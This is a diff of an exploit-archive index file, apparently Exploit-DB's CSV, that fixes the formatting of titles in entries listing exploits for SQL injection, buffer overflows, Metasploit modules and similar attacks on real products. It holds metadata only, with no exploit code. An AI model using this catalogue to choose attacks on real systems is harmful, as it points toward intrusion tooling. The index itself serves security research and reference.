15984,platforms/windows/remote/15984.html,"Microsoft Data Access Components (MS11-002)",2011-01-12,"Peter Vreugdenhil",windows,remote,0 15979,platforms/php/webapps/15979.txt,"Joomla! Spam Mail Relay",2011-01-12,"Jeff Channell",php,webapps,0 @@ -13900,7 +13900,7 @@ id,file,description,date,author,platform,type,port 16049,platforms/php/webapps/16049.txt,"AWCM 2.2 Final - Local File Inclusion",2011-01-26,Cucura,php,webapps,0 16050,platforms/php/webapps/16050.txt,"class.upload.php 0.30 - Remote File Upload",2011-01-26,DIES3L,php,webapps,0 16051,platforms/php/webapps/16051.txt,"Froxlor 0.9.15 - Remote File Inclusion",2011-01-26,DIES3L,php,webapps,0 -16052,platforms/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",windows,remote,0 +16052,platforms/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 - Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",windows,remote,0 16053,platforms/windows/remote/16053.txt,"Oracle Document Capture Actbar2.ocx Insecure Method",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 16054,platforms/windows/webapps/16054.txt,"sap crystal report server 2008 - Directory Traversal",2011-01-26,"Dmitriy Chastuhin",windows,webapps,0 16055,platforms/windows/remote/16055.txt,"Oracle Document Capture empop3.dll Insecure Methods",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 @@ -13950,11 +13950,11 @@ id,file,description,date,author,platform,type,port 16113,platforms/php/webapps/16113.txt,"oscommerce authentication bypass",2011-02-04,"Nicolas Krassas",php,webapps,0 16114,platforms/php/webapps/16114.txt,"Chamilo 1.8.7 / Dokeos 1.8.6 - Remote File Disclosure",2011-02-05,beford,php,webapps,0 16116,platforms/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 Full Info Disclosure",2011-02-05,"Daniel Godoy",php,webapps,0 -16117,platforms/php/webapps/16117.txt,"Escort und Begleitservice Agentur Script SQL Injection Vunerability",2011-02-05,NoNameMT,php,webapps,0 +16117,platforms/php/webapps/16117.txt,"Escort und Begleitservice Agentur Script - SQL Injection",2011-02-05,NoNameMT,php,webapps,0 16119,platforms/freebsd/local/16119.c,"FreeBSD 5.4-RELEASE ftpd 6.00LS - sendfile kernel mem-leak Exploit",2011-02-06,kingcope,freebsd,local,0 16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow DoS Skinfile",2011-02-06,badc0re,windows,dos,0 16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0 -16122,platforms/php/webapps/16122.txt,"Dew-NewPHPLinks 2.1b (index.php) - SQL Injection",2011-02-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 +16122,platforms/php/webapps/16122.txt,"Dew-NewPHPLinks 2.1b - (index.php) SQL Injection",2011-02-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 16221,platforms/php/webapps/16221.txt,"Comment Rating 2.9.23 WordPress Plugin - Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0 16127,platforms/php/webapps/16127.txt,"T-Content Managment System - Multiple Vulnerabilities",2011-02-07,"Daniel Godoy",php,webapps,0 16128,platforms/php/webapps/16128.txt,"jakcms 2.0 pro rc5 - Stored XSS via useragent http header injection",2011-02-07,"Saif El-Sherei",php,webapps,0 @@ -13963,13 +13963,13 @@ id,file,description,date,author,platform,type,port 16131,platforms/php/webapps/16131.txt,"SWFUpload 2.5.0 Beta 3 - File Arbitrary Upload",2011-02-07,"Daniel Godoy",php,webapps,0 16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow Exploit",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 16133,platforms/windows/local/16133.htm,"AoA Mp4 converter 4.1.0 - ActiveX Stack Overflow Exploit",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 -16134,platforms/php/webapps/16134.txt,"Model Agentur Script SQL Injection Vunerability",2011-02-08,NoNameMT,php,webapps,0 +16134,platforms/php/webapps/16134.txt,"Model Agentur Script - SQL Injection",2011-02-08,NoNameMT,php,webapps,0 16135,platforms/php/webapps/16135.html,"dotProject 2.1.5 - CSRF",2011-02-08,"AutoSec Tools",php,webapps,0 16136,platforms/php/webapps/16136.html,"AIOCP 1.4.001 - CSRF",2011-02-08,"AutoSec Tools",php,webapps,0 -16137,platforms/multiple/remote/16137.c,"Multiple Vendor Calendar Manager Remote Code Execution",2011-02-09,"Rodrigo Rubira Branco",multiple,remote,0 +16137,platforms/multiple/remote/16137.c,"Multiple Vendor Calendar Manager - Remote Code Execution",2011-02-09,"Rodrigo Rubira Branco",multiple,remote,0 16138,platforms/windows/local/16138.c,"DESlock+ <= 4.1.10 - vdlptokn.sys Local Kernel ring0 SYSTEM Exploit",2011-02-09,mu-b,windows,local,0 16139,platforms/php/webapps/16139.txt,"Auto Database System 1.0 Infusion Addon SQL Injection",2011-02-09,Saif,php,webapps,0 -16140,platforms/php/webapps/16140.txt,"Web 2.0 Social Network Freunde Community SQL Injection Vunerability",2011-02-09,NoNameMT,php,webapps,0 +16140,platforms/php/webapps/16140.txt,"Web 2.0 Social Network Freunde Community - SQL Injection",2011-02-09,NoNameMT,php,webapps,0 16141,platforms/windows/local/16141.py,"xRadio 0.95b - (.xrl) Local Buffer Overflow (SEH)",2011-02-09,b0telh0,windows,local,0 16167,platforms/php/webapps/16167.txt,"jSchool Advanced SQL Injection",2011-02-14,eXa.DisC,php,webapps,0 16168,platforms/php/webapps/16168.txt,"runcms 2.2.2 - Multiple Vulnerabilities",2011-02-14,"High-Tech Bridge SA",php,webapps,0 @@ -13989,7 +13989,7 @@ id,file,description,date,author,platform,type,port 16156,platforms/php/webapps/16156.txt,"Kunena < 1.5.13 / < 1.6.3 - SQL Injection",2011-02-11,"Red Matter",php,webapps,0 16157,platforms/jsp/webapps/16157.py,"Openedit 5.1294 - Remote Code Execution Exploit",2011-02-11,mr_me,jsp,webapps,0 16158,platforms/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,php,webapps,0 -16159,platforms/php/webapps/16159.txt,"Escort Agency CMS Blind SQL Injection Vunerability",2011-02-12,NoNameMT,php,webapps,0 +16159,platforms/php/webapps/16159.txt,"Escort Agency CMS - Blind SQL Injection",2011-02-12,NoNameMT,php,webapps,0 16160,platforms/php/webapps/16160.txt,"Pixelpost 1.7.3 - Multiple POST Variables SQL Injection",2011-02-12,LiquidWorm,php,webapps,0 16162,platforms/windows/local/16162.pl,"CuteZip 2.1 - Buffer Overflow Exploit",2011-02-12,"C4SS!0 G0M3S",windows,local,0 16169,platforms/windows/local/16169.py,"Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit",2011-02-15,mr_me,windows,local,0 @@ -14011,11 +14011,11 @@ id,file,description,date,author,platform,type,port 16191,platforms/windows/dos/16191.pl,"Novell ZenWorks 10 / 11 - TFTPD Remote Code Execution",2011-02-18,"Francis Provencher",windows,dos,0 16192,platforms/linux/dos/16192.pl,"Novell Iprint LPD Remote Code Execution",2011-02-18,"Francis Provencher",linux,dos,0 16254,platforms/windows/dos/16254.txt,"Nitro PDF Reader 1.4.0 - Heap Memory Corruption PoC",2011-02-28,LiquidWorm,windows,dos,0 -16225,platforms/cfm/webapps/16225.txt,"Alcassoft's SOPHIA CMS SQL Injection",2011-02-24,p0pc0rn,cfm,webapps,0 +16225,platforms/cfm/webapps/16225.txt,"Alcassoft's SOPHIA CMS - SQL Injection",2011-02-24,p0pc0rn,cfm,webapps,0 16226,platforms/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 16196,platforms/php/webapps/16196.txt,"eventum issue tracking system 2.3.1 - Stored XSS",2011-02-19,"Saif El-Sherei",php,webapps,0 -16197,platforms/php/webapps/16197.txt,"Escort Directory CMS SQL Injection Vunerability",2011-02-19,NoNameMT,php,webapps,0 -16198,platforms/php/webapps/16198.txt,"Independent Escort CMS Blind SQL Injection Vunerability",2011-02-19,NoNameMT,php,webapps,0 +16197,platforms/php/webapps/16197.txt,"Escort Directory CMS - SQL Injection",2011-02-19,NoNameMT,php,webapps,0 +16198,platforms/php/webapps/16198.txt,"Independent Escort CMS - Blind SQL Injection",2011-02-19,NoNameMT,php,webapps,0 16199,platforms/php/webapps/16199.txt,"Icy Phoenix 1.3.0.53a HTTP Referer stored XSS",2011-02-20,"Saif El-Sherei",php,webapps,0 16200,platforms/php/webapps/16200.py,"JAKCMS 2.01 - Code Execution Exploit",2011-02-20,mr_me,php,webapps,0 16201,platforms/php/webapps/16201.py,"JAKCMS 2.01 RC1 - Blind SQL Injection Exploit",2011-02-20,mr_me,php,webapps,0 @@ -14034,7 +14034,7 @@ id,file,description,date,author,platform,type,port 16218,platforms/php/webapps/16218.txt,"Z-Vote 1.1 WordPress Plugin - SQL Injection",2011-02-23,"High-Tech Bridge SA",php,webapps,0 16213,platforms/php/webapps/16213.txt,"Hyena Cart - (index.php) SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 16214,platforms/php/webapps/16214.txt,"tplSoccerStats - (player.php) SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 -16217,platforms/php/webapps/16217.txt,"bitweaver 2.8.1 Persistent XSS",2011-02-23,lemlajt,php,webapps,0 +16217,platforms/php/webapps/16217.txt,"bitweaver 2.8.1 - Persistent XSS",2011-02-23,lemlajt,php,webapps,0 16227,platforms/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 16228,platforms/ios/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0 16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0 @@ -14109,7 +14109,7 @@ id,file,description,date,author,platform,type,port 16306,platforms/windows/remote/16306.rb,"Mozilla Suite/Firefox InstallVersion->compareTo() - Code Execution",2010-09-20,Metasploit,windows,remote,0 16307,platforms/multiple/local/16307.rb,"PeaZip 2.6.1 Zip Processing Command Injection",2010-09-20,Metasploit,multiple,local,0 16308,platforms/multiple/remote/16308.rb,"Maple Maplet File Creation and Command Execution",2010-09-20,Metasploit,multiple,remote,0 -16309,platforms/multiple/remote/16309.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun (1)",2010-09-20,Metasploit,multiple,remote,0 +16309,platforms/multiple/remote/16309.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (1)",2010-09-20,Metasploit,multiple,remote,0 16310,platforms/multiple/remote/16310.rb,"PHP 4 - unserialize() ZVAL Reference Counter Overflow (Cookie)",2010-09-20,Metasploit,multiple,remote,0 16311,platforms/linux/remote/16311.rb,"wu-ftpd - SITE EXEC/INDEX Format String",2010-11-30,Metasploit,linux,remote,0 16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST)",2010-12-14,Metasploit,multiple,remote,0 @@ -14294,7 +14294,7 @@ id,file,description,date,author,platform,type,port 16491,platforms/windows/remote/16491.rb,"WinVNC Web Server 3.3.3r7 - GET Overflow",2009-12-06,Metasploit,windows,remote,0 16492,platforms/windows/remote/16492.rb,"Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow",2010-09-21,Metasploit,windows,remote,0 16493,platforms/windows/remote/16493.rb,"EnjoySAP SAP GUI ActiveX Control Arbitrary File Download",2010-12-01,Metasploit,windows,remote,0 -16494,platforms/windows/remote/16494.rb,"Adobe CoolType SING Table 'uniqueName' Stack Buffer Overflow (1)",2010-09-20,Metasploit,windows,remote,0 +16494,platforms/windows/remote/16494.rb,"Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (1)",2010-09-20,Metasploit,windows,remote,0 16495,platforms/multiple/remote/16495.rb,"Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit",2011-01-22,Metasploit,multiple,remote,0 16496,platforms/windows/remote/16496.rb,"Kazaa Altnet Download Manager ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16497,platforms/windows/remote/16497.rb,"RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 @@ -14303,8 +14303,8 @@ id,file,description,date,author,platform,type,port 16500,platforms/windows/remote/16500.rb,"Hyleos ChemView ActiveX Control Stack Buffer Overflow",2010-07-27,Metasploit,windows,remote,0 16501,platforms/windows/remote/16501.rb,"Novell iPrint Client ActiveX Control call-back-url Buffer Overflow",2010-09-21,Metasploit,windows,remote,0 16502,platforms/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 -16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use After Free (1)",2010-04-30,Metasploit,windows,local,0 -16504,platforms/windows/local/16504.rb,"Adobe util.printf() Buffer Overflow",2010-05-03,Metasploit,windows,local,0 +16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use-After-Free (1)",2010-04-30,Metasploit,windows,local,0 +16504,platforms/windows/local/16504.rb,"Adobe - util.printf() Buffer Overflow",2010-05-03,Metasploit,windows,local,0 16505,platforms/windows/remote/16505.rb,"Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16506,platforms/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow",2010-07-16,Metasploit,windows,remote,0 16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 @@ -14333,7 +14333,7 @@ id,file,description,date,author,platform,type,port 16530,platforms/windows/remote/16530.rb,"mIRC IRC URL Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16531,platforms/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow",2010-04-30,Metasploit,windows,local,0 16532,platforms/windows/remote/16532.rb,"Microsoft Internet Explorer - XML Core Services HTTP Request Handling",2010-07-03,Metasploit,windows,remote,0 -16533,platforms/windows/remote/16533.rb,"Microsoft Internet Explorer - CSS Recursive Import Use After Free",2011-02-08,Metasploit,windows,remote,0 +16533,platforms/windows/remote/16533.rb,"Microsoft Internet Explorer - CSS Recursive Import Use-After-Free",2011-02-08,Metasploit,windows,remote,0 16534,platforms/windows/remote/16534.rb,"AtHocGov IWSAlerts ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16535,platforms/windows/remote/16535.rb,"Trend Micro OfficeScan Client ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16536,platforms/windows/remote/16536.rb,"Green Dam URL Processing Buffer Overflow",2010-03-10,Metasploit,windows,remote,0 @@ -14346,7 +14346,7 @@ id,file,description,date,author,platform,type,port 16543,platforms/windows/remote/16543.rb,"Novell iPrint Client ActiveX Control Date/Time Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16544,platforms/windows/remote/16544.rb,"SonicWALL Aventail epi.dll AuthCredential Format String Exploit",2010-09-20,Metasploit,windows,remote,0 16545,platforms/windows/remote/16545.rb,"Microsoft Help Center XSS and Command Execution",2010-09-20,Metasploit,windows,remote,0 -16546,platforms/windows/local/16546.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow (1)",2010-09-20,Metasploit,windows,local,0 +16546,platforms/windows/local/16546.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (1)",2010-09-20,Metasploit,windows,local,0 16547,platforms/windows/remote/16547.rb,"Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption",2010-07-12,Metasploit,windows,remote,0 16548,platforms/windows/remote/16548.rb,"Amaya Browser 11.0 - bdo tag Overflow",2010-05-09,Metasploit,windows,remote,0 16549,platforms/windows/remote/16549.rb,"Microsoft Internet Explorer - isComponentInstalled Overflow",2010-05-09,Metasploit,windows,remote,0 @@ -14358,7 +14358,7 @@ id,file,description,date,author,platform,type,port 16555,platforms/windows/remote/16555.rb,"Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption",2010-07-12,Metasploit,windows,remote,0 16556,platforms/windows/local/16556.rb,"XMPlay 3.3.0.4 - (ASX Filename) Buffer Overflow",2010-05-09,Metasploit,windows,local,0 16557,platforms/windows/remote/16557.rb,"Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16558,platforms/windows/remote/16558.rb,"Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow",2011-01-08,Metasploit,windows,remote,0 +16558,platforms/windows/remote/16558.rb,"Apple QuickTime 7.6.6 - Invalid SMIL URI Buffer Overflow",2011-01-08,Metasploit,windows,remote,0 16559,platforms/windows/remote/16559.rb,"Roxio CinePlayer ActiveX Control Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16560,platforms/windows/remote/16560.rb,"Autodesk IDrop ActiveX Control Heap Memory Corruption",2010-04-30,Metasploit,windows,remote,0 16561,platforms/windows/remote/16561.rb,"Microsoft Internet Explorer - COM CreateObject Code Execution",2010-09-20,Metasploit,windows,remote,0 @@ -14390,7 +14390,7 @@ id,file,description,date,author,platform,type,port 16587,platforms/windows/remote/16587.rb,"Sun Java Runtime New Plugin docbase Buffer Overflow",2011-01-08,Metasploit,windows,remote,0 16588,platforms/windows/remote/16588.rb,"HP LoadRunner 9.0 - ActiveX AddFolder Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16589,platforms/windows/local/16589.rb,"Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution",2011-01-08,Metasploit,windows,local,0 -16590,platforms/windows/remote/16590.rb,"Microsoft Internet Explorer - DHTML Behaviors Use After Free",2010-12-14,Metasploit,windows,remote,0 +16590,platforms/windows/remote/16590.rb,"Microsoft Internet Explorer - DHTML Behaviors Use-After-Free",2010-12-14,Metasploit,windows,remote,0 16591,platforms/windows/remote/16591.rb,"AOL Radio AmpX - ActiveX Control ConvertFile() Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16592,platforms/windows/remote/16592.rb,"SoftArtisans XFile FileManager ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption Exploit",2010-06-15,Metasploit,windows,local,0 @@ -14419,12 +14419,12 @@ id,file,description,date,author,platform,type,port 16616,platforms/windows/remote/16616.rb,"SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16617,platforms/windows/local/16617.rb,"VUPlayer - (.m3u) Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16618,platforms/windows/local/16618.rb,"BlazeDVD 5.1 - PLF Buffer Overflow",2010-11-11,Metasploit,windows,local,0 -16619,platforms/windows/local/16619.rb,"Adobe CoolType SING Table 'uniqueName' Stack Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 +16619,platforms/windows/local/16619.rb,"Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16620,platforms/windows/local/16620.rb,"Media Jukebox 8.0.400 - Buffer Overflow Exploit (SEH)",2011-01-08,Metasploit,windows,local,0 16621,platforms/windows/local/16621.rb,"Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow",2010-12-16,Metasploit,windows,local,0 -16622,platforms/windows/local/16622.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun (2)",2010-09-25,Metasploit,windows,local,0 -16623,platforms/windows/local/16623.rb,"Adobe - Doc.media.newPlayer Use After Free (2)",2010-09-25,Metasploit,windows,local,0 -16624,platforms/windows/local/16624.rb,"Adobe util.printf() Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 +16622,platforms/windows/local/16622.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (2)",2010-09-25,Metasploit,windows,local,0 +16623,platforms/windows/local/16623.rb,"Adobe - Doc.media.newPlayer Use-After-Free (2)",2010-09-25,Metasploit,windows,local,0 +16624,platforms/windows/local/16624.rb,"Adobe - util.printf() Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16625,platforms/windows/local/16625.rb,"Microsoft Excel Malformed FEATHEADER Record",2010-09-25,Metasploit,windows,local,0 16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 - (.pls) Stack Buffer Overflow",2010-01-28,Metasploit,windows,local,0 16627,platforms/windows/local/16627.rb,"UltraISO CUE File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 @@ -14452,7 +14452,7 @@ id,file,description,date,author,platform,type,port 16649,platforms/windows/remote/16649.rb,"Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit",2010-09-25,Metasploit,windows,remote,0 16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow Exploit (SEH) (2)",2010-09-25,Metasploit,windows,local,0 16651,platforms/windows/local/16651.rb,"AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow",2010-09-25,Metasploit,windows,local,0 -16652,platforms/windows/local/16652.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow (2)",2010-09-25,Metasploit,windows,local,0 +16652,platforms/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow",2010-12-16,Metasploit,windows,local,0 16654,platforms/windows/local/16654.rb,"Orbital Viewer - ORB File Parsing Buffer Overflow",2010-03-09,Metasploit,windows,local,0 16655,platforms/windows/local/16655.rb,"ProShow Gold 4.0.2549 - (.PSH) Stack Buffer Overflow",2010-09-25,Metasploit,windows,local,0 @@ -14470,11 +14470,11 @@ id,file,description,date,author,platform,type,port 16667,platforms/windows/local/16667.rb,"Adobe Flash Player - 'Button' Remote Code Execution",2010-11-01,Metasploit,windows,local,0 16668,platforms/windows/local/16668.rb,"BACnet OPC Client Buffer Overflow",2010-11-14,Metasploit,windows,local,0 16669,platforms/windows/local/16669.rb,"Adobe Illustrator CS4 14.0.0 - Postscript (.eps) Buffer Overflow",2010-09-25,Metasploit,windows,local,0 -16670,platforms/windows/local/16670.rb,"Adobe Acrobat Bundled LibTIFF Integer Overflow",2010-09-25,Metasploit,windows,local,0 -16671,platforms/windows/local/16671.rb,"Adobe PDF Embedded EXE Social Engineering",2010-12-16,Metasploit,windows,local,0 +16670,platforms/windows/local/16670.rb,"Adobe Acrobat - Bundled LibTIFF Integer Overflow",2010-09-25,Metasploit,windows,local,0 +16671,platforms/windows/local/16671.rb,"Adobe PDF - Embedded EXE Social Engineering",2010-12-16,Metasploit,windows,local,0 16672,platforms/windows/local/16672.rb,"Adobe - JBIG2Decode Memory Corruption Exploit (2)",2010-09-25,Metasploit,windows,local,0 16673,platforms/windows/local/16673.rb,"Digital Music Pad 8.2.3.3.4 - Stack Buffer Overflow",2010-11-11,Metasploit,windows,local,0 -16674,platforms/windows/local/16674.rb,"Adobe Collab.collectEmailInfo() Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16674,platforms/windows/local/16674.rb,"Adobe - Collab.collectEmailInfo() Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner - (.DBR) Path Buffer Overflow",2010-09-20,Metasploit,windows,local,0 16676,platforms/windows/local/16676.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (2)",2011-01-08,Metasploit,windows,local,0 16677,platforms/windows/local/16677.rb,"CA Antivirus Engine CAB Buffer Overflow",2010-11-11,Metasploit,windows,local,0 @@ -14482,7 +14482,7 @@ id,file,description,date,author,platform,type,port 16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow",2011-01-08,Metasploit,windows,local,0 16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic VBP Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16681,platforms/windows/local/16681.rb,"Adobe - Collab.getIcon() Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 -16682,platforms/windows/local/16682.rb,"Adobe PDF Escape EXE Social Engineering (No JavaScript)",2010-12-16,Metasploit,windows,local,0 +16682,platforms/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript)",2010-12-16,Metasploit,windows,local,0 16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (3)",2010-09-25,Metasploit,windows,local,0 16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .M3U Buffer Overflow",2010-04-30,Metasploit,windows,local,0 16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback ActiveX Control Buffer Overflow",2010-11-05,Metasploit,windows,remote,0 @@ -14507,7 +14507,7 @@ id,file,description,date,author,platform,type,port 16704,platforms/windows/remote/16704.rb,"LeapFTP 3.0.1 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16705,platforms/windows/remote/16705.rb,"Seagull FTP 3.3 build 409 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16706,platforms/windows/remote/16706.rb,"War-FTPD 1.65 Password Overflow",2010-07-03,Metasploit,windows,remote,0 -16707,platforms/windows/remote/16707.rb,"freeFTPd 1.0 Username Overflow",2010-07-03,Metasploit,windows,remote,0 +16707,platforms/windows/remote/16707.rb,"freeFTPd 1.0 - Username Overflow",2010-07-03,Metasploit,windows,remote,0 16708,platforms/windows/remote/16708.rb,"LeapWare LeapFTP 2.7.3.600 - PASV Reply Client Overflow",2010-04-30,Metasploit,windows,remote,0 16709,platforms/windows/remote/16709.rb,"ProFTP 2.9 Banner Remote Buffer Overflow Exploit",2010-07-03,Metasploit,windows,remote,0 16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 PASV Remote Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 @@ -14530,7 +14530,7 @@ id,file,description,date,author,platform,type,port 16727,platforms/windows/remote/16727.rb,"Sasser Worm avserve FTP PORT Buffer Overflow",2010-04-30,Metasploit,windows,remote,5554 16728,platforms/windows/remote/16728.rb,"Gekko Manager FTP Client Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16729,platforms/windows/remote/16729.rb,"SlimFTPd LIST Concatenation Overflow",2010-10-05,Metasploit,windows,remote,0 -16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Username Overflow",2010-09-20,Metasploit,windows,remote,0 +16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP - Username Overflow",2010-09-20,Metasploit,windows,remote,0 16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB FTP PASS Overflow (Win32)",2010-04-30,Metasploit,win_x86,remote,0 16732,platforms/windows/remote/16732.rb,"HTTPDX - tolog() Function Format String (1)",2010-08-25,Metasploit,windows,remote,0 16733,platforms/windows/remote/16733.rb,"FileCopa FTP Server pre 18 Jul Version",2010-04-30,Metasploit,windows,remote,21 @@ -14616,7 +14616,7 @@ id,file,description,date,author,platform,type,port 16813,platforms/windows/remote/16813.rb,"Novell NetMail 3.52d NMAP STOR Buffer Overflow",2010-05-09,Metasploit,windows,remote,689 16814,platforms/windows/remote/16814.rb,"Novell GroupWise Messenger Client Buffer Overflow",2010-06-22,Metasploit,windows,remote,8300 16815,platforms/windows/remote/16815.rb,"Novell ZENworks 6.5 Desktop/Server Management Overflow",2010-07-25,Metasploit,windows,remote,0 -16816,platforms/windows/remote/16816.rb,"GAMSoft TelSrv 1.5 Username Buffer Overflow",2010-06-22,Metasploit,windows,remote,23 +16816,platforms/windows/remote/16816.rb,"GAMSoft TelSrv 1.5 - Username Buffer Overflow",2010-06-22,Metasploit,windows,remote,23 16817,platforms/windows/remote/16817.rb,"GoodTech Telnet Server 5.0.6 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,2380 16818,platforms/windows/remote/16818.rb,"YPOPS 0.6 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,25 16819,platforms/windows/remote/16819.rb,"SoftiaCom WMailserver 1.0 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,25 @@ -14658,7 +14658,7 @@ id,file,description,date,author,platform,type,port 16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 - URL Handling Buffer Overflow (Linux)",2010-09-20,Metasploit,linux,remote,0 16856,platforms/cgi/webapps/16856.rb,"DD-WRT HTTP Daemon Arbitrary Command Execution",2010-07-07,Metasploit,cgi,webapps,0 16857,platforms/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution",2010-10-05,Metasploit,cgi,webapps,0 -16858,platforms/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package passwd.php3 - Arbitrary Command Execution",2010-10-18,Metasploit,php,webapps,0 +16858,platforms/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package - passwd.php3 Arbitrary Command Execution",2010-10-18,Metasploit,php,webapps,0 16859,platforms/linux/remote/16859.rb,"Samba lsa_io_trans_names Heap Overflow (Linux)",2010-07-14,Metasploit,linux,remote,0 16860,platforms/linux/remote/16860.rb,"Samba - chain_reply Memory Corruption (Linux x86)",2010-09-04,Metasploit,linux,remote,0 